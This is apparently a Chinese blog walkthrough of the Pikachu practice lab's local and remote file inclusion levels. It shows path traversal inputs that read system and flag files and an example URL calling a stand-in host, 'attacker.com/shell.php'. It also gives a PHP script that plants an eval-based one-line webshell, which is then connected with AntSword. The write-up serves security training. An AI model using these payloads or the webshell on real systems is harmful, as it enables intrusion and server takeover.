Pikachu之文件包含
File Inclusion(Local)文件包含漏洞是程序根据用户输入去加载包含一个文件但没有做好限制导致攻击者可以让程序加载本不应该加载的文件。假设网站有三个文件index.php news.php about.phpindex.php里面有这样的代码?php $page$_GET[page]; include($page); ?include()把另一个文件拿过来执行比如index.php?pagenews.php就是include(news.php);网页显示新闻页面如果是index.php?pageabout.php那么就是include(about.php);那么我们可以通过控制?page来进行非法输入?page../../../../Windows/win.ini来读取系统文件我们来尝试去读取我放在桌面上的flag.txthttp://pikachu.com/vul/fileinclude/fi_local.php?filenamefile1.phpsubmit%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2fi_local.php?filenamefile1.php我们修改file1.php为C:\Users\Z\Desktop\flag.txt发现报错查看报错include()函数里面在我们的路径前面拼接了一个include/路径因为include路径里面没有C:\Users\Z\Desktop\flag.txt所以报错了include(“include/用户输入”)?filename..\..\..\..\..\..\..\..\..\..\..\..\..\..\Users\Z\Desktop\flag.txt我们可以多输一些来确保回到根目录File Inclusion(remoto)我们打开会看到有一行红色报错提示我们去打开allow_url_include这个是默认关闭的为什么这个是默认关闭的因为allow_url_include Off是不允许 include 一个 URL这很危险因为后台include($_GET[filename]);攻击者filenamehttp://attacker.com/shell.php这样就会被拿到权限PHP 从 5.x 开始默认关闭我们打开php.ini路径为下打开pikachu正在使用的php版本找到php.iniphpstudy_pro\Extensions\php\php5.6.9nts搜索allow_url_include,改为On并保存退出刷新页面就好了我们在pikachu_pro\WWW目录下放置一个test.php里面有我们的生成一句话木马?php $dir dirname($_SERVER[SCRIPT_FILENAME]); file_put_contents($dir . /shell.php, ?php eval(\$_POST[\Z\]);?); echo $dir . /shell.php; ?访问使用蚁剑进行连接因为生成在了D:/phpstudy_pro/WWW/shell.php所以url填的是127.0.0.1/shell.php密码为Z

相关新闻

技术平权——眨眼猫打造“一顿饭的会务智能体”,让每一场会务活动都能拥有自己的智能体小程序!

技术平权——眨眼猫打造“一顿饭的会务智能体”,让每一场会务活动都能拥有自己的智能体小程序!

关键词▪️一顿饭的成本:平均360元▪️一顿饭的时间:30分钟完成小程序搭建▪️高端会务功能:同样拥有会务报名、现场签到、查座、资料下载、日程、手册等全面功能眨眼猫会务智能体前身是“眨眼猫智慧会务”,从2018年起&#xff0c…

2026/7/18 4:14:25 阅读更多 →
NVIDIA Isaac Lab:机器人强化学习的仿真训练与Sim2Real迁移实战

NVIDIA Isaac Lab:机器人强化学习的仿真训练与Sim2Real迁移实战

1. 项目概述:从仿真到现实,机器人学习的“健身房”如果你正在或打算涉足机器人学习领域,那么“仿真”这个词对你来说一定不陌生。无论是让机械臂学会抓取,还是让四足机器人学会行走,直接在物理机器人上“试错”的成本和…

2026/7/18 4:14:25 阅读更多 →
Android JSON解析方案对比:从fastjson到现代替代方案

Android JSON解析方案对比:从fastjson到现代替代方案

1. 为什么我们需要重新审视Android JSON解析方案fastjson作为阿里巴巴开源的Java JSON处理库,曾经是Android开发者的首选工具。它的高性能和简单易用的API设计,确实在早期移动互联网时代解决了JSON序列化/反序列化的痛点。但作为一名从2012年就开始接触A…

2026/7/18 4:14:25 阅读更多 →

最新新闻

春晚机器人秀技术拆解:从多智能体协同到工程化落地挑战

春晚机器人秀技术拆解:从多智能体协同到工程化落地挑战

1. 从春晚舞台到技术巅峰:一场机器人秀背后的硬核拆解今年春晚,相信不少朋友和我一样,被一个瞬间“震”住了:一群形态各异的机器人,在舞台上整齐划一地起舞、奔跑,甚至完成高难度的后空翻。这个来自宇树科技…

2026/7/18 5:04:44 阅读更多 →
windows网络适配器驱动开发-移动宽带 (MBB) WDF 类扩展 (MBBCx)

windows网络适配器驱动开发-移动宽带 (MBB) WDF 类扩展 (MBBCx)

从下一个版本的 Windows 10 开始,Windows 驱动程序工具包 (WDK) 包括移动宽带 (MBB) WDF 类扩展,可与 NetAdapterCx 配合使用。 MBB-NetAdapter客户端驱动程序首先是完全完善的 WDF 客户端驱动程序,然后是 NetAdapterCx 客户端驱动程序&#…

2026/7/18 5:04:44 阅读更多 →
C++循环结构深度解析:for、while、do...while实战指南与避坑

C++循环结构深度解析:for、while、do...while实战指南与避坑

1. 项目概述:为什么循环是C的“发动机”?如果你刚开始学C,或者已经写过一些简单的打印、计算程序,可能会觉得代码是一行一行往下走的,像一条直线。但当你真正想解决点实际问题,比如计算全班50个同学的平均分…

2026/7/18 5:04:44 阅读更多 →
Web安全基石:访问控制模型、RBAC实战与纵深防御体系

Web安全基石:访问控制模型、RBAC实战与纵深防御体系

1. 项目概述:为什么访问控制是Web安全的基石做Web安全这些年,我处理过太多因为访问控制没做好而引发的安全事件。从普通的企业官网到复杂的金融交易系统,几乎每一个被攻破的案例背后,都能找到访问控制失效的影子。很多人一提到Web…

2026/7/18 5:04:44 阅读更多 →
Unity Android异步纹理加载优化:ETC2压缩与缓存策略实战

Unity Android异步纹理加载优化:ETC2压缩与缓存策略实战

1. 项目概述:为什么异步加载纹理在Android上是个“老大难”?做移动端开发,尤其是Unity游戏,在Android平台上处理纹理加载,说多了都是泪。你肯定遇到过这种场景:玩家进入一个新场景,或者打开一个…

2026/7/18 5:04:43 阅读更多 →
走进 Gang of Four 设计模式:享元模式

走进 Gang of Four 设计模式:享元模式

走进 Gang of Four 设计模式:享元模式 说明:不仅告诉你"怎么用",更告诉你"为什么这样设计" 前置知识:Java 面向对象基础(接口、HashMap、不可变对象)、内存管理基本概念 📊…

2026/7/18 5:03:43 阅读更多 →

日新闻

从模糊意图到可执行指令:Claude PRD中Prompt Engineering与需求颗粒度的5级映射法则

从模糊意图到可执行指令:Claude PRD中Prompt Engineering与需求颗粒度的5级映射法则

更多请点击: https://kaifayun.com 第一章:从模糊意图到可执行指令:Claude PRD中Prompt Engineering与需求颗粒度的5级映射法则 在Claude驱动的产品需求文档(PRD)生成实践中,原始业务意图往往以自然语言片…

2026/7/18 0:00:38 阅读更多 →
Cursor配置生成失效?3大隐藏陷阱+4行修复代码,资深工程师连夜整理的紧急补救清单

Cursor配置生成失效?3大隐藏陷阱+4行修复代码,资深工程师连夜整理的紧急补救清单

更多请点击: https://codechina.net 第一章:Cursor配置生成失效?3大隐藏陷阱4行修复代码,资深工程师连夜整理的紧急补救清单 Cursor 配置生成突然失效,是近期高频报障场景。表面看是 cursor.config.json 未更新或 LSP…

2026/7/18 0:00:38 阅读更多 →
某智驾大牛创业

某智驾大牛创业

作者:钟声编辑:Mark出品:红色星际头图:智能驾驶图片据悉,国内某头部智驾公司端到端模型技术大牛Z投身创业,并且已经拿到融资。Z不仅是该头部公司内部最年轻的对标阿里P10级别技术负责⼈,更是业内…

2026/7/18 0:00:38 阅读更多 →

周新闻

月新闻